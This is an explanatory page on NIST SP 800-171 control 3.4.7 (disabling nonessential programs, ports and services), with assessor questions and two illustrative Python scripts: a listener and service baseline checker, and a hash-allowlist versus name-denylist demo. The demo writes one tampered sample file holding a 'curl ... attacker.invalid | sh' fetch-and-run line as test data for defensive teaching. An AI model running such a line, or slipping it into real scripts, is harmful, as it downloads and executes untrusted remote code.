3.4.7—Configuration Management - Derived
Derived Requirement
>Control Description
Restrict, disable, or prevent the use of nonessential programs, functions, ports, protocols, and services.
>Discussion
Restricting the use of nonessential software (programs) includes restricting the roles allowed to approve program execution; prohibiting auto-execute; program blacklisting and whitelisting; or restricting the number of program instances executed at the same time. The organization makes a security-based determination which functions, ports, protocols, and/or services are restricted. Bluetooth, File Transfer Protocol (FTP), and peer-to-peer networking are examples of protocols organizations consider preventing the use of, restricting, or disabling.
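The discussion above names whitelisting, FTP, Bluetooth and peer-to-peer networking as typical targets. The Python script below is an added example written for this page, not code from NIST SP 800-171 or from any product: it shows the allowlist comparison that turns the control into a repeatable check. Constructed `ss -tlnp` rows and a constructed list of enabled systemd units are compared against a hypothetical approved baseline, and every listener or enabled unit outside that baseline is reported, with FTP and BitTorrent listeners called out by their well-known ports. The baseline sets, the port-to-protocol table, the process names and the sample rows are all assumptions; on a real host you would feed it the live output of `ss -tlnp`, `ss -ulnp` and `systemctl list-unit-files --state=enabled`.

```python
"""Baseline check for nonessential listeners and services (added example).

Illustrative code written for this page, not part of NIST SP 800-171 or any
vendor tool. Anything listening or enabled that is not in the approved
baseline is a finding. Inputs are constructed inline so the script runs
offline; on a real host feed it `ss -tlnp` (TCP) / `ss -ulnp` (UDP) and
`systemctl list-unit-files --state=enabled`.
"""
import re
from dataclasses import dataclass

# Hypothetical approved baseline for one host (an assumption, not a standard).
APPROVED_LISTENERS = {
    ("tcp", 22, "sshd"),
    ("tcp", 443, "nginx"),
}
APPROVED_SERVICES = {"sshd.service", "nginx.service", "auditd.service", "chronyd.service"}

# Protocols the control discussion names as candidates for disabling, keyed by
# the well-known port they commonly use (assumed mapping).
FLAGGED_PORTS = {21: "FTP", 6881: "BitTorrent (peer-to-peer)"}

# Constructed sample of `ss -tlnp` output; not captured from a real system.
SAMPLE_SS_TCP = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22         0.0.0.0:*         users:(("sshd",pid=812,fd=3))
LISTEN 0      511    0.0.0.0:443        0.0.0.0:*         users:(("nginx",pid=1200,fd=6))
LISTEN 0      32     0.0.0.0:21         0.0.0.0:*         users:(("vsftpd",pid=1401,fd=4))
LISTEN 0      50     0.0.0.0:6881       0.0.0.0:*         users:(("transmission-daemon",pid=1555,fd=9))
LISTEN 0      128    [::]:22            [::]:*            users:(("sshd",pid=812,fd=4))
"""

# Constructed sample of enabled unit names; not from a real system.
SAMPLE_ENABLED_UNITS = [
    "sshd.service", "nginx.service", "auditd.service", "chronyd.service",
    "vsftpd.service", "bluetooth.service",
]

PROCESS_RE = re.compile(r'\("([^"]+)",pid=\d+')


@dataclass(frozen=True)
class Listener:
    proto: str
    port: int
    process: str


def parse_ss(text, proto="tcp"):
    """Parse `ss -lnp`-style output into Listener records."""
    listeners = []
    for line in text.splitlines():
        fields = line.split()
        # Data rows start with the socket state; the header row does not.
        if len(fields) < 5 or fields[0] not in ("LISTEN", "UNCONN"):
            continue
        # rsplit handles 0.0.0.0:22, [::]:22 and *:22 alike.
        port = int(fields[3].rsplit(":", 1)[1])
        match = PROCESS_RE.search(line)
        process = match.group(1) if match else "unknown"
        listeners.append(Listener(proto, port, process))
    return listeners


def nonessential_listeners(listeners):
    """Return (listener, reason) for every listener outside the approved baseline."""
    findings = []
    for lst in listeners:
        if (lst.proto, lst.port, lst.process) in APPROVED_LISTENERS:
            continue
        reason = FLAGGED_PORTS.get(lst.port, "not in approved baseline")
        findings.append((lst, reason))
    return findings


def nonessential_services(enabled_units):
    """Enabled units that are not in the approved service baseline, sorted."""
    return sorted(set(enabled_units) - APPROVED_SERVICES)


def remediation_commands(units):
    """Commands that stop and disable each nonessential unit."""
    return [f"systemctl disable --now {unit}" for unit in units]


if __name__ == "__main__":
    for lst, reason in nonessential_listeners(parse_ss(SAMPLE_SS_TCP)):
        print(f"FINDING listener {lst.proto}/{lst.port} ({lst.process}): {reason}")
    extra = nonessential_services(SAMPLE_ENABLED_UNITS)
    for unit in extra:
        print(f"FINDING enabled service not in baseline: {unit}")
    for cmd in remediation_commands(extra):
        print(f"  remediate: {cmd}")
```

The listener check keys on protocol, port and process together, so an approved port bound by an unexpected binary is still a finding; the service check is a plain set difference against the documented baseline, which is the "authorized list" an assessor asks to see. Run on the constructed input it reports the FTP and BitTorrent listeners and the vsftpd and bluetooth units.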
>Assessment Interview Topics
Questions assessors commonly ask
Process & Governance:
- What policies govern software usage and installation restrictions?
- What approval process exists for software installation?
- How do you maintain lists of authorized software?
- Who has authority to approve or deny software requests?
- What procedures address unauthorized software discovery?
Technical Implementation:
- What application control technologies restrict software installation?
- How do you enforce whitelisting or blacklisting of applications?
- What mechanisms prevent users from installing unauthorized software?
- How do you detect and remove unauthorized applications?
- What endpoint protection enforces software restrictions?
Evidence & Documentation:
- Can you provide authorized software lists (whitelist)?
- What application control policies and configurations exist?
- Can you show blocked unauthorized software installation attempts?
- What scan results identify unauthorized software?
- What audit reports verify software restriction enforcement?
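The technical-implementation and evidence questions above turn on how whitelisting or blacklisting is actually enforced. The Python below is an added example written for this page, not code from NIST, from this site or from any application-control product: it shows the decision logic behind a hash-based allowlist next to a name-based denylist, using constructed files in a temporary directory as stand-ins for programs. Real enforcement belongs to the operating system or an application-control agent (for example fapolicyd on Linux, AppLocker or WDAC on Windows); the program names, file contents and lists here are assumptions chosen to show the two cases a denylist misses.

```python
"""Application allowlisting by file hash versus denylisting by name (added example).

Illustrative code written for this page, not from any product or standard.
Production enforcement is done by the OS or an application-control agent; this
shows the decision logic such tools apply and why a hash allowlist is the
stronger control. All "programs" are constructed files in a temp directory.
"""
import hashlib
import tempfile
from pathlib import Path


def sha256_file(path):
    """SHA-256 of a file, streamed so large binaries are not read into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_allowlist(approved_paths):
    """Authorized software list keyed by digest; the file name is only a label."""
    return {sha256_file(p): Path(p).name for p in approved_paths}


def decide_by_hash(path, allowlist):
    """Allowlist: execution is permitted only if this exact binary is approved."""
    return "allow" if sha256_file(path) in allowlist else "deny"


def decide_by_name(path, denylist):
    """Denylist: execution is blocked only if the file name is prohibited."""
    return "deny" if Path(path).name in denylist else "allow"


def run_scenarios():
    """Return {scenario: (hash_allowlist_decision, name_denylist_decision)}."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for sub in ("bin", "home", "tmp"):
            (root / sub).mkdir()

        # Hypothetical approved program; its digest goes on the allowlist.
        approved = root / "bin" / "report-tool"
        approved.write_bytes(b"#!/bin/sh\necho report\n")
        allowlist = build_allowlist([approved])

        # Hypothetical name-based denylist, the weaker alternative.
        denylist = {"torrent-client"}

        # 1. An exact copy of the approved program in another location.
        copy = root / "home" / "report-tool"
        copy.write_bytes(approved.read_bytes())

        # 2. Same file name as the approved program, but tampered contents.
        tampered = root / "tmp" / "report-tool"
        tampered.write_bytes(b"#!/bin/sh\necho report\ncurl -s http://attacker.invalid | sh\n")

        # 3. A denylisted P2P client copied under an innocuous name.
        renamed = root / "home" / "calc"
        renamed.write_bytes(b"#!/bin/sh\necho torrent-client\n")

        cases = {
            "exact copy of approved": copy,
            "tampered approved name": tampered,
            "renamed denylisted program": renamed,
        }
        return {
            label: (decide_by_hash(p, allowlist), decide_by_name(p, denylist))
            for label, p in cases.items()
        }


if __name__ == "__main__":
    for label, (by_hash, by_name) in run_scenarios().items():
        print(f"{label:28s} hash-allowlist={by_hash:5s} name-denylist={by_name}")
```

The two decisions diverge exactly where it matters: the tampered binary and the renamed P2P client both slip past the name denylist but are denied by the hash allowlist, while the untouched approved program passes both. That difference is what the "blocked unauthorized software installation attempts" evidence should capture, so the allowlist, not the denylist, is the artefact to keep current and produce for an assessor.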